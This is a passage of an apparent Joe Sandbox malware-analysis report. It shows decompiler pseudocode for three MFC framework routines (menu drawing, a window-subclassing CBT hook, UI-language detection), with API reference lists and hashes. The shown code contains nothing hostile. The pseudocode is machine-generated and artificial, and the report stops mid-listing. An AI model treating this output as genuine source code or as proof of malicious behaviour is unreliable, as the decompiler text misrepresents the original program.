					 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x30))(GetSysColor(0x14));
					E00422504(_t399, 1);
					__eflags =  *(_t400 - 0x18);
					if(__eflags == 0) {
						goto L25;
					}
					asm("cdq");
					 *(_t400 - 0x18) =  *((intOrPtr*)(_t400 - 0x40)) - _t388;
					 *(_t400 - 0x18) =  *(_t400 - 0x18) >> 1;
					asm("cdq");
					E0041F58B(_t399,  *((intOrPtr*)(_t400 - 0x24)) + 4, ( *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28)) - _t388 >> 1) -  *(_t400 - 0x18) +  *((intOrPtr*)(_t400 - 0x28)) + 1, 2, 0, _t400 - 0x30, 0);
					 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
					 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x30))(GetSysColor(0x11));
					_push(0);
					_push(_t400 - 0x30);
					_push(0);
					asm("cdq");
					_push(0);
					_push(( *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28)) - _t388 >> 1) -  *(_t400 - 0x18) +  *((intOrPtr*)(_t400 - 0x28)));
					goto L24;
				} else {
					E00413342(_t400 - 0x60, _t218 + 0x1c);
					 *((intOrPtr*)(_t400 - 0x60)) =  *((intOrPtr*)(_t400 - 0x24)) + 2;
					E00423E9D(_t399, _t400 - 0x60, GetSysColor(0xd));
					if( *(_t400 - 0x3c) != 0 && ( *( *((intOrPtr*)(_t400 + 8)) + 0x10) & 0x0000000a) == 0) {
						 *((intOrPtr*)(_t400 - 0x34)) =  *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28));
						 *((intOrPtr*)(_t400 - 0x10)) =  *((intOrPtr*)(_t400 - 0x24)) -  *(_t400 - 0x2c);
						_t320 = GetSysColor(0x10);
						E00424022(_t399,  *((intOrPtr*)(_t400 - 0x10)) + 1,  *(_t400 - 0x2c),  *((intOrPtr*)(_t400 - 0x28)),  *((intOrPtr*)(_t400 - 0x10)) + 1,  *((intOrPtr*)(_t400 - 0x34)) + 1, GetSysColor(0x14), _t320);
					}
					if( *(_t400 - 0x18) == 0) {
						L25:
						if( *(_t400 - 0x3c) == 0) {
							L32:
							 *((intOrPtr*)( *_t399 + 0x20))( *((intOrPtr*)(_t400 - 0x50)));
							 *((char*)(_t400 - 4)) = 0;
							E00422E06(_t400 - 0x88);
							return E00431B73(E004010B0( *((intOrPtr*)(_t400 - 0x30)) + 0xfffffff0, _t388));
						}
						 *((intOrPtr*)(_t400 - 0x10)) = 0;
						 *((intOrPtr*)(_t400 - 0x14)) = 0x4502c8;
						_t231 =  *( *((intOrPtr*)(_t400 + 8)) + 0x10);
						 *((char*)(_t400 - 4)) = 2;
						_t417 = _t231 & 0x00000002;
						if((_t231 & 0x00000002) == 0) {
							__eflags = _t231 & 0x00000008;
							if(__eflags == 0) {
								L31:
								E00422859(_t400 - 0x4c);
								 *((char*)(_t400 - 4)) = 3;
								E0040876B(_t400 - 0x4c, 0);
								E00408791(_t400 - 0x4c,  *((intOrPtr*)(_t400 - 0x38)));
								InflateRect(_t400 - 0x2c, 0xffffffff, 0xffffffff);
								E0041F40E(_t399,  *(_t400 - 0x2c),  *((intOrPtr*)(_t400 - 0x28)),  *((intOrPtr*)(_t400 - 0x24)),  *((intOrPtr*)(_t400 - 0x20)), _t400 - 0x4c, 0, 0, 0xcc0020);
								 *((char*)(_t400 - 4)) = 2;
								E00422E06(_t400 - 0x4c);
								 *((char*)(_t400 - 4)) = 1;
								 *((intOrPtr*)(_t400 - 0x14)) = 0x4502c8;
								E0040ADD4(0, _t400 - 0x14, 0x4502c8, _t399, _t417);
								goto L32;
							}
							_push(0xffffff);
							_push( *(_t400 - 0x1c));
							_push(_t400 - 0x14);
							_push( *((intOrPtr*)(_t400 - 0x38)));
							E004234DC(0, 0x4502c8, _t399, __eflags);
							L30:
							 *((intOrPtr*)(_t400 - 0x38)) = _t400 - 0x14;
							goto L31;
						}
						_push( *(_t400 - 0x1c));
						_push(_t400 - 0x14);
						_push( *((intOrPtr*)(_t400 - 0x38)));
						E00423285(0, 0x4502c8, _t399, _t417);
						goto L30;
					} else {
						 *((intOrPtr*)(_t400 - 0x10)) =  *_t399;
						 *((intOrPtr*)( *((intOrPtr*)(_t400 - 0x10)) + 0x2c))(GetSysColor(0xd));
						if(( *( *((intOrPtr*)(_t400 + 8)) + 0x10) & 0x00000002) == 0) {
							_t313 = GetSysColor(0xe);
						} else {
							_t313 =  *(_t400 - 0x1c);
						}
						_t388 =  *_t399;
						 *((intOrPtr*)(_t388 + 0x30))(_t313);
						L23:
						_push(0);
						_push(_t400 - 0x30);
						_push(0);
						asm("cdq");
						asm("cdq");
						_push(2);
						_push(( *((intOrPtr*)(_t400 - 0x20)) -  *((intOrPtr*)(_t400 - 0x28)) - _t388 >> 1) - ( *((intOrPtr*)(_t400 - 0x40)) - _t388 >> 1) +  *((intOrPtr*)(_t400 - 0x28)));
						L24:
						_push( *((intOrPtr*)(_t400 - 0x24)) + 3);
						E0041F58B(_t399);
						goto L25;
					}
				}
			}




















                  0x0041f7ed
                  0x0041f7ed
                  0x0041f7f7
                  0x0041f7fc
                  0x0041f807
                  0x0041f80c
                  0x0041f814
                  0x0041f81c
                  0x0041f827
                  0x0041f832
                  0x0041f84c
                  0x0041f856
                  0x0041f860
                  0x0041f86b
                  0x0041f876
                  0x0041f87b
                  0x0041f888
                  0x0041f8a4
                  0x0041f8a7
                  0x0041f8a7
                  0x0041f8b6
                  0x0041f8b9
                  0x0041f8be
                  0x0041f8c3
                  0x0041f8f5
                  0x0041f900
                  0x0041f902
                  0x0041f8d5
                  0x0041f8de
                  0x0041f8e5
                  0x0041f8eb
                  0x0041f8ee
                  0x0041f8ee
                  0x0041f908
                  0x0041f913
                  0x0041f91a
                  0x0041f926
                  0x0041f931
                  0x0041f93a
                  0x0041f93d
                  0x0041f940
                  0x0041f94b
                  0x0041f94e
                  0x0041f95a
                  0x0041f95e
                  0x0041f96e
                  0x0041f97b
                  0x0041f985
                  0x0041f988
                  0x0041f98f
                  0x0041f992
                  0x0041fa41
                  0x0041fa4d
                  0x0041fa53
                  0x0041fa56
                  0x0041fa58
                  0x0041fae9
                  0x0041faec
                  0x0041faee
                  0x0041faf0
                  0x0041fafa
                  0x0041fb03
                  0x0041fb06
                  0x0041fb0b
                  0x0041fb16
                  0x0041fb20
                  0x0041fb20
                  0x0041faf0
                  0x0041fb25
                  0x0041fb28
                  0x00000000
                  0x0041fb2a
                  0x0041fb31
                  0x0041fb38
                  0x0041fb43
                  0x00000000
                  0x0041fb43
                  0x0041fb28
                  0x0041fa62
                  0x0041fa6d
                  0x0041fa74
                  0x0041fa79
                  0x0041fa7c
                  0x00000000
                  0x00000000
                  0x0041fa88
                  0x0041fa8b
                  0x0041fa8e
                  0x0041fa9b
                  0x0041fab4
                  0x0041fabd
                  0x0041fac8
                  0x0041facb
                  0x0041facf
                  0x0041fad6
                  0x0041fad7
                  0x0041fadf
                  0x0041fae3
                  0x00000000
                  0x0041f998
                  0x0041f99f
                  0x0041f9ac
                  0x0041f9b8
                  0x0041f9c0
                  0x0041f9d3
                  0x0041f9dc
                  0x0041f9df
                  0x0041f9f9
                  0x0041f9f9
                  0x0041fa01
                  0x0041fb77
                  0x0041fb7a
                  0x0041fc2f
                  0x0041fc36
                  0x0041fc3f
                  0x0041fc42
                  0x0041fc57
                  0x0041fc57
                  0x0041fb85
                  0x0041fb88
                  0x0041fb8e
                  0x0041fb91
                  0x0041fb95
                  0x0041fb97
                  0x0041fbaa
                  0x0041fbac
                  0x0041fbc8
                  0x0041fbcb
                  0x0041fbd4
                  0x0041fbd8
                  0x0041fbe3
                  0x0041fbf0
                  0x0041fc0f
                  0x0041fc17
                  0x0041fc1b
                  0x0041fc23
                  0x0041fc27
                  0x0041fc2a
                  0x00000000
                  0x0041fc2a
                  0x0041fbae
                  0x0041fbb3
                  0x0041fbb9
                  0x0041fbba
                  0x0041fbbd
                  0x0041fbc2
                  0x0041fbc5
                  0x00000000
                  0x0041fbc5
                  0x0041fb99
                  0x0041fb9f
                  0x0041fba0
                  0x0041fba3
                  0x00000000
                  0x0041fa07
                  0x0041fa0b
                  0x0041fa16
                  0x0041fa20
                  0x0041fa29
                  0x0041fa22
                  0x0041fa22
                  0x0041fa22
                  0x0041fa2b
                  0x0041fa30
                  0x0041fb46
                  0x0041fb46
                  0x0041fb4a
                  0x0041fb51
                  0x0041fb52
                  0x0041fb5a
                  0x0041fb66
                  0x0041fb68
                  0x0041fb69
                  0x0041fb6f
                  0x0041fb72
                  0x00000000
                  0x0041fb72
                  0x0041fa01

                  APIs
                  • __EH_prolog3.LIBCMT ref: 0041F7F7
                    • Part of subcall function 00406039: __EH_prolog3.LIBCMT ref: 00406040
                  • _memset.LIBCMT ref: 0041F832
                  • GetMenuItemInfoA.USER32 ref: 0041F863
                  • GetMenuItemInfoA.USER32 ref: 0041F899
                  • GetObjectA.GDI32(?,00000018,?), ref: 0041F8E5
                  • GetSystemMetrics.USER32 ref: 0041F8F8
                  • GetSystemMetrics.USER32 ref: 0041F902
                  • GetSysColor.USER32(00000004), ref: 0041F943
                  • GetSysColor.USER32(0000000D), ref: 0041F9AF
                  • GetSysColor.USER32(00000010), ref: 0041F9DF
                  • GetSysColor.USER32(00000014), ref: 0041F9E4
                  • GetSysColor.USER32(0000000D), ref: 0041FA0E
                  • GetSysColor.USER32(0000000E), ref: 0041FA29
                    • Part of subcall function 00423E9D: SetBkColor.GDI32(00000200,?), ref: 00423EC1
                    • Part of subcall function 00423E9D: ExtTextOutA.GDI32(00000200,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 00423ED4
                  • GetSysColor.USER32(00000014), ref: 0041FA65
                    • Part of subcall function 00422504: SetBkMode.GDI32(?,?), ref: 00422521
                    • Part of subcall function 00422504: SetBkMode.GDI32(?,?), ref: 0042252E
                    • Part of subcall function 0041F58B: ExtTextOutA.GDI32(?,?,?,?,?,?,?,?), ref: 0041F5AC
                  • GetSysColor.USER32(00000011), ref: 0041FAC0
                  • GetSysColor.USER32(00000014), ref: 0041FB06
                  • GetSysColor.USER32(00000010), ref: 0041FB0B
                  • GetSysColor.USER32(00000007), ref: 0041FB3B
                  • InflateRect.USER32(?,000000FF,000000FF), ref: 0041FBF0
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Color$H_prolog3InfoItemMenuMetricsModeSystemText$InflateObjectRect_memset
                  • String ID: 0$46E$@
                  • API String ID: 3743147133-3652610858
                  • Opcode ID: 51d2bea7bd644e3431cdd1b914a9e6e16b4e9d200d04218f16f2602888e0cc88
                  • Instruction ID: 7f78c14f1eea8d06dfa9bbb1ad9c7d036a1403066194708c7aa81ff3ee08e1b5
                  • Opcode Fuzzy Hash: 51d2bea7bd644e3431cdd1b914a9e6e16b4e9d200d04218f16f2602888e0cc88
                  • Instruction Fuzzy Hash: 85F12B71A00219AFCF04DFA9C985EEEBBB9FF48304F14415AF505A7291DB34AA45CF54
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00410CBA, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E00410CBA(void* __ebx, intOrPtr __edi, void* __esi, void* __eflags) {
				intOrPtr _t54;
				signed int _t56;
				signed int _t59;
				long _t60;
				signed int _t64;
				void* _t66;
				signed int _t72;
				signed int _t74;
				signed int _t76;
				long _t83;
				signed int _t86;
				signed short _t87;
				signed int _t88;
				int _t94;
				void* _t106;
				long* _t108;
				long _t110;
				signed int _t111;
				CHAR* _t112;
				intOrPtr _t113;
				void* _t116;
				void* _t119;
				intOrPtr _t120;

				_t119 = __eflags;
				_t105 = __edi;
				_push(0x148);
				E00431B04(E0044B0DA, __ebx, __edi, __esi);
				_t110 =  *(_t116 + 0x10);
				_t94 =  *(_t116 + 0xc);
				_push(0x406452);
				 *(_t116 - 0x120) = _t110;
				_t54 = E00420AEC(_t94, 0x466508, __edi, _t110, _t119);
				_t120 = _t54;
				_t97 = 0 | _t120 == 0x00000000;
				 *((intOrPtr*)(_t116 - 0x11c)) = _t54;
				_t121 = _t120 == 0;
				if(_t120 == 0) {
					_t54 = E00406436(_t94, _t97, __edi, _t110, _t121);
				}
				if( *(_t116 + 8) == 3) {
					_t106 =  *_t110;
					_t111 =  *(_t54 + 0x14);
					_t56 =  *(E0041F363(_t94, _t106, _t111, __eflags) + 0x14) & 0x000000ff;
					 *(_t116 - 0x124) = _t56;
					__eflags = _t111;
					if(_t111 != 0) {
						L7:
						__eflags =  *0x4668d4;
						if( *0x4668d4 == 0) {
							L12:
							__eflags = _t111;
							if(__eflags == 0) {
								__eflags =  *0x4664a4;
								if( *0x4664a4 != 0) {
									L19:
									__eflags = (GetClassLongA(_t94, 0xffffffe0) & 0x0000ffff) -  *0x4664a4; // 0x8000
									if(__eflags != 0) {
										L23:
										_t59 = GetWindowLongA(_t94, 0xfffffffc);
										 *(_t116 - 0x14) = _t59;
										__eflags = _t59;
										if(_t59 != 0) {
											_t112 = "AfxOldWndProc423";
											_t64 = GetPropA(_t94, _t112);
											__eflags = _t64;
											if(_t64 == 0) {
												SetPropA(_t94, _t112,  *(_t116 - 0x14));
												_t66 = GetPropA(_t94, _t112);
												__eflags = _t66 -  *(_t116 - 0x14);
												if(_t66 ==  *(_t116 - 0x14)) {
													GlobalAddAtomA(_t112);
													SetWindowLongA(_t94, 0xfffffffc, E00410B6D);
												}
											}
										}
										L27:
										_t105 =  *((intOrPtr*)(_t116 - 0x11c));
										_t60 = CallNextHookEx( *(_t105 + 0x28), 3, _t94,  *(_t116 - 0x120));
										__eflags =  *(_t116 - 0x124);
										_t110 = _t60;
										if( *(_t116 - 0x124) != 0) {
											UnhookWindowsHookEx( *(_t105 + 0x28));
											_t50 = _t105 + 0x28;
											 *_t50 =  *(_t105 + 0x28) & 0x00000000;
											__eflags =  *_t50;
										}
										goto L30;
									}
									goto L27;
								}
								_t113 = 0x30;
								E00431160(_t106, _t116 - 0x154, 0, _t113);
								 *((intOrPtr*)(_t116 - 0x154)) = _t113;
								_push(_t116 - 0x154);
								_push("#32768");
								_push(0);
								_t72 = E0040D4AB(_t94, _t97, _t106, "#32768", __eflags);
								 *0x4664a4 = _t72;
								__eflags = _t72;
								if(_t72 == 0) {
									_t74 = GetClassNameA(_t94, _t116 - 0x118, 0x100);
									__eflags = _t74;
									if(_t74 == 0) {
										goto L23;
									}
									 *((char*)(_t116 - 0x19)) = 0;
									_t76 = E004336E0(_t116 - 0x118, "#32768");
									__eflags = _t76;
									if(_t76 == 0) {
										goto L27;
									}
									goto L23;
								}
								goto L19;
							}
							E0041F3AF(_t116 - 0x18, __eflags,  *((intOrPtr*)(_t111 + 0x1c)));
							 *(_t116 - 4) =  *(_t116 - 4) & 0x00000000;
							E0040EE89(_t111, _t94);
							 *((intOrPtr*)( *_t111 + 0x50))();
							_t108 =  *((intOrPtr*)( *_t111 + 0xf8))();
							_t83 = SetWindowLongA(_t94, 0xfffffffc, E0040F720);
							__eflags = _t83 - E0040F720;
							if(_t83 != E0040F720) {
								 *_t108 = _t83;
							}
							 *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) =  *( *((intOrPtr*)(_t116 - 0x11c)) + 0x14) & 0x00000000;
							 *(_t116 - 4) =  *(_t116 - 4) | 0xffffffff;
							__eflags =  *(_t116 - 0x14);
							if( *(_t116 - 0x14) != 0) {
								_push( *(_t116 - 0x18));
								_push(0);
								E0041EAC0();
							}
							goto L27;
						}
						_t86 = GetClassLongA(_t94, 0xffffffe6);
						__eflags = _t86 & 0x00010000;
						if((_t86 & 0x00010000) != 0) {
							goto L27;
						}
						_t87 =  *(_t106 + 0x28);
						__eflags = _t87 - 0xffff;
						if(_t87 <= 0xffff) {
							 *(_t116 - 0x18) = 0;
							GlobalGetAtomNameA( *(_t106 + 0x28) & 0x0000ffff, _t116 - 0x18, 5);
							_t87 = _t116 - 0x18;
						}
						_t88 = E0040D6F3(_t87, "ime");
						_pop(_t97);
						__eflags = _t88;
						if(_t88 == 0) {
							goto L27;
						}
						goto L12;
					}
					__eflags =  *(_t106 + 0x20) & 0x40000000;
					if(( *(_t106 + 0x20) & 0x40000000) != 0) {
						goto L27;
					}
					__eflags = _t56;
					if(_t56 != 0) {
						goto L27;
					}
					goto L7;
				} else {
					CallNextHookEx( *(_t54 + 0x28),  *(_t116 + 8), _t94, _t110);
					L30:
					return E00431B87(_t94, _t105, _t110);
				}
			}


























                  0x00410cba
                  0x00410cba
                  0x00410cba
                  0x00410cc4
                  0x00410cc9
                  0x00410ccc
                  0x00410ccf
                  0x00410cd9
                  0x00410cdf
                  0x00410ce6
                  0x00410ce8
                  0x00410ceb
                  0x00410cf1
                  0x00410cf3
                  0x00410cf5
                  0x00410cf5
                  0x00410cfe
                  0x00410d13
                  0x00410d15
                  0x00410d1d
                  0x00410d21
                  0x00410d27
                  0x00410d29
                  0x00410d40
                  0x00410d40
                  0x00410d47
                  0x00410d94
                  0x00410d94
                  0x00410d96
                  0x00410dfe
                  0x00410e06
                  0x00410e42
                  0x00410e4e
                  0x00410e55
                  0x00410e87
                  0x00410e8a
                  0x00410e90
                  0x00410e93
                  0x00410e95
                  0x00410e9d
                  0x00410ea4
                  0x00410ea6
                  0x00410ea8
                  0x00410eaf
                  0x00410eb7
                  0x00410eb9
                  0x00410ebc
                  0x00410ebf
                  0x00410ecd
                  0x00410ecd
                  0x00410ebc
                  0x00410ea8
                  0x00410ed3
                  0x00410ed9
                  0x00410ee5
                  0x00410eeb
                  0x00410ef2
                  0x00410ef4
                  0x00410ef9
                  0x00410eff
                  0x00410eff
                  0x00410eff
                  0x00410eff
                  0x00000000
                  0x00410f03
                  0x00000000
                  0x00410e57
                  0x00410e0a
                  0x00410e15
                  0x00410e20
                  0x00410e26
                  0x00410e2c
                  0x00410e2d
                  0x00410e2f
                  0x00410e37
                  0x00410e3d
                  0x00410e40
                  0x00410e66
                  0x00410e6c
                  0x00410e6e
                  0x00000000
                  0x00000000
                  0x00410e78
                  0x00410e7c
                  0x00410e83
                  0x00410e85
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00410e85
                  0x00000000
                  0x00410e40
                  0x00410d9e
                  0x00410da3
                  0x00410daa
                  0x00410db3
                  0x00410dc9
                  0x00410dcb
                  0x00410dd1
                  0x00410dd3
                  0x00410dd5
                  0x00410dd5
                  0x00410ddd
                  0x00410de1
                  0x00410de5
                  0x00410de9
                  0x00410def
                  0x00410df2
                  0x00410df4
                  0x00410df4
                  0x00000000
                  0x00410de9
                  0x00410d4c
                  0x00410d52
                  0x00410d57
                  0x00000000
                  0x00000000
                  0x00410d5d
                  0x00410d60
                  0x00410d65
                  0x00410d72
                  0x00410d76
                  0x00410d7c
                  0x00410d7c
                  0x00410d85
                  0x00410d8b
                  0x00410d8c
                  0x00410d8e
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00410d8e
                  0x00410d2b
                  0x00410d32
                  0x00000000
                  0x00000000
                  0x00410d38
                  0x00410d3a
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00410d00
                  0x00410d08
                  0x00410f05
                  0x00410f0a
                  0x00410f0a

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 00410CC4
                    • Part of subcall function 00420AEC: __EH_prolog3.LIBCMT ref: 00420AF3
                  • CallNextHookEx.USER32 ref: 00410D08
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • GetClassLongA.USER32 ref: 00410D4C
                  • GlobalGetAtomNameA.KERNEL32 ref: 00410D76
                  • SetWindowLongA.USER32 ref: 00410DCB
                  • _memset.LIBCMT ref: 00410E15
                  • GetClassLongA.USER32 ref: 00410E45
                  • GetClassNameA.USER32(?,?,00000100), ref: 00410E66
                  • GetWindowLongA.USER32 ref: 00410E8A
                  • GetPropA.USER32 ref: 00410EA4
                  • SetPropA.USER32(?,AfxOldWndProc423,?), ref: 00410EAF
                  • GetPropA.USER32 ref: 00410EB7
                  • GlobalAddAtomA.KERNEL32 ref: 00410EBF
                  • SetWindowLongA.USER32 ref: 00410ECD
                  • CallNextHookEx.USER32 ref: 00410EE5
                  • UnhookWindowsHookEx.USER32(?), ref: 00410EF9
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: Long$ClassHookPropWindow$AtomCallGlobalH_prolog3NameNext$Exception@8H_prolog3_ThrowUnhookWindows_memset
                  • String ID: #32768$AfxOldWndProc423$ime
                  • API String ID: 1191297049-4034971020
                  • Opcode ID: e5ae81d980a84f8551ec54e42acd0f54d674218401d2fe6b82eb2adcea4507fa
                  • Instruction ID: 32270c68322271c2e59bf9d54f63d676ca0dffc6bbc1c643ca40a15bfc5c9aae
                  • Opcode Fuzzy Hash: e5ae81d980a84f8551ec54e42acd0f54d674218401d2fe6b82eb2adcea4507fa
                  • Instruction Fuzzy Hash: 1061E43150031AABCB219B62DC09BEF7B78FF05325F100566F505A6291DBB8DAC1CBAD
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004153B2, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 158libraryloaderCOMMON
                  Download Yara Rule
                  C-Code - Quality: 87%
                  			E004153B2(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				struct HINSTANCE__* _t61;
				_Unknown_base(*)()* _t62;
				struct HINSTANCE__* _t63;
				struct HINSTANCE__* _t76;
				unsigned int _t79;
				signed short _t87;
				unsigned int _t88;
				_Unknown_base(*)()* _t95;
				signed short _t97;
				unsigned int _t98;
				signed int _t106;
				signed int _t118;
				signed int _t127;
				void* _t130;

				_push(0x15c);
				E00431B04(E0044B29F, __ebx, __edi, __esi);
				 *((intOrPtr*)(_t130 - 0x124)) =  *((intOrPtr*)(_t130 + 8));
				_t123 = 0;
				 *((intOrPtr*)(_t130 - 0x130)) =  *((intOrPtr*)(_t130 + 0xc));
				 *(_t130 - 0x120) = 0;
				 *(_t130 - 0x11c) = 0;
				_t61 = GetModuleHandleA("kernel32.dll");
				_t106 = GetProcAddress;
				 *(_t130 - 0x134) = _t61;
				_t62 = GetProcAddress(_t61, "GetUserDefaultUILanguage");
				if(_t62 == 0) {
					_t63 = GetModuleHandleA("ntdll.dll");
					if(_t63 != 0) {
						 *(_t130 - 0x120) = 0;
						EnumResourceLanguagesA(_t63, 0x10, 1, E00414A3E, _t130 - 0x120);
						if( *(_t130 - 0x120) != 0) {
							_t79 =  *(_t130 - 0x120) & 0x0000ffff;
							_t123 = _t79 & 0x3ff;
							 *((intOrPtr*)(_t130 - 0x148)) = ConvertDefaultLocale(_t79 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t123);
							 *((intOrPtr*)(_t130 - 0x144)) = ConvertDefaultLocale(_t123);
							 *(_t130 - 0x11c) = 2;
						}
					}
				} else {
					_t87 =  *_t62() & 0x0000ffff;
					 *(_t130 - 0x120) = _t87;
					_t88 = _t87 & 0x0000ffff;
					_t123 = 0x3ff;
					_t118 = _t88 & 0x3ff;
					 *(_t130 - 0x11c) = _t118;
					 *((intOrPtr*)(_t130 - 0x148)) = ConvertDefaultLocale(_t88 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t118);
					 *((intOrPtr*)(_t130 - 0x144)) = ConvertDefaultLocale( *(_t130 - 0x11c));
					 *(_t130 - 0x11c) = 2;
					_t95 = GetProcAddress( *(_t130 - 0x134), "GetSystemDefaultUILanguage");
					if(_t95 != 0) {
						_t97 =  *_t95() & 0x0000ffff;
						 *(_t130 - 0x120) = _t97;
						_t98 = _t97 & 0x0000ffff;
						_t123 = _t98 & 0x3ff;
						 *((intOrPtr*)(_t130 - 0x140)) = ConvertDefaultLocale(_t98 >> 0x0000000a << 0x0000000a & 0x0000ffff | _t123);
						 *((intOrPtr*)(_t130 - 0x13c)) = ConvertDefaultLocale(_t123);
						 *(_t130 - 0x11c) = 4;
					}
				}
				 *(_t130 - 0x11c) =  &(1[ *(_t130 - 0x11c)]);
				 *((intOrPtr*)(_t130 +  *(_t130 - 0x11c) * 4 - 0x148)) = 0x800;
				_t126 = 0x400000;
				 *((char*)(_t130 - 0x13)) = 0;
				 *((char*)(_t130 - 0x14)) = 0;
				if(GetModuleFileNameA(0x400000, _t130 - 0x118, 0x105) != 0) {
					_t123 = 0x20;
					_t106 = 0;
					E00431160(_t123, _t130 - 0x168, 0, _t123);
					 *(_t130 - 0x168) = _t123;
					 *((intOrPtr*)(_t130 - 0x160)) = _t130 - 0x118;
					 *((intOrPtr*)(_t130 - 0x154)) = 0x3e8;
					 *(_t130 - 0x14c) = 0x400000;
					 *((intOrPtr*)(_t130 - 0x164)) = 0x88;
					E00414A58(_t130 - 0x12c, 0xffffffff);
					 *(_t130 - 4) = 0;
					if(E00414B0F(_t130 - 0x12c, _t130 - 0x168) != 0) {
						E00414B49(_t130 - 0x12c);
					}
					_t127 = 0;
					if( *(_t130 - 0x11c) <= _t106) {
						L13:
						_t126 = 0;
						goto L15;
					} else {
						while(1) {
							_t76 = E00415026( *((intOrPtr*)(_t130 - 0x124)),  *((intOrPtr*)(_t130 - 0x130)), _t123,  *((intOrPtr*)(_t130 + _t127 * 4 - 0x148)));
							if(_t76 != _t106) {
								_t126 = _t76;
								break;
							}
							_t127 =  &(1[_t127]);
							if(_t127 <  *(_t130 - 0x11c)) {
								continue;
							}
							goto L13;
						}
						L15:
						 *(_t130 - 4) =  *(_t130 - 4) | 0xffffffff;
						E004150F8(_t130 - 0x12c);
						goto L7;
					}
				}
				L7:
				return E00431B87(_t106, _t123, _t126);
			}

















                  0x004153b2
                  0x004153bc
                  0x004153ca
                  0x004153d3
                  0x004153da
                  0x004153e0
                  0x004153e6
                  0x004153ec
                  0x004153ee
                  0x004153fa
                  0x00415400
                  0x00415404
                  0x004154b4
                  0x004154b8
                  0x004154cb
                  0x004154d1
                  0x004154de
                  0x004154e0
                  0x004154fb
                  0x00415507
                  0x0041550f
                  0x00415515
                  0x00415515
                  0x004154de
                  0x0041540a
                  0x00415412
                  0x00415415
                  0x0041541b
                  0x00415423
                  0x0041542d
                  0x00415436
                  0x00415444
                  0x00415457
                  0x0041545d
                  0x00415467
                  0x0041546b
                  0x00415473
                  0x00415476
                  0x0041547c
                  0x00415489
                  0x00415495
                  0x0041549d
                  0x004154a3
                  0x004154a3
                  0x0041546b
                  0x00415525
                  0x0041552b
                  0x00415542
                  0x00415548
                  0x0041554c
                  0x00415558
                  0x00415564
                  0x00415566
                  0x00415570
                  0x00415586
                  0x0041558c
                  0x00415592
                  0x0041559c
                  0x004155a2
                  0x004155ac
                  0x004155be
                  0x004155c8
                  0x004155d0
                  0x004155d0
                  0x004155d5
                  0x004155dd
                  0x00415605
                  0x00415605
                  0x00000000
                  0x004155df
                  0x004155df
                  0x004155f2
                  0x004155fa
                  0x00415609
                  0x00415609
                  0x00415609
                  0x004155fc
                  0x00415603
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00415603
                  0x0041560b
                  0x0041560b
                  0x00415615
                  0x00000000
                  0x0041561a
                  0x004155dd
                  0x0041555a
                  0x0041555f

                  APIs
                  • __EH_prolog3_GS.LIBCMT ref: 004153BC
                  • GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,00415683,?,?), ref: 004153EC
                  • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 00415400
                  • ConvertDefaultLocale.KERNEL32(?), ref: 0041543C
                  • ConvertDefaultLocale.KERNEL32(?), ref: 0041544A
                  • GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 00415467
                  • ConvertDefaultLocale.KERNEL32(?), ref: 00415492
                  • ConvertDefaultLocale.KERNEL32(000003FF), ref: 0041549B
                  • GetModuleHandleA.KERNEL32(ntdll.dll), ref: 004154B4
                  • EnumResourceLanguagesA.KERNEL32(00000000,00000010,00000001,Function_00014A3E,?), ref: 004154D1
                  • ConvertDefaultLocale.KERNEL32(?), ref: 00415504
                  • ConvertDefaultLocale.KERNEL32(00000000), ref: 0041550D
                  • GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 00415550
                  • _memset.LIBCMT ref: 00415570
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
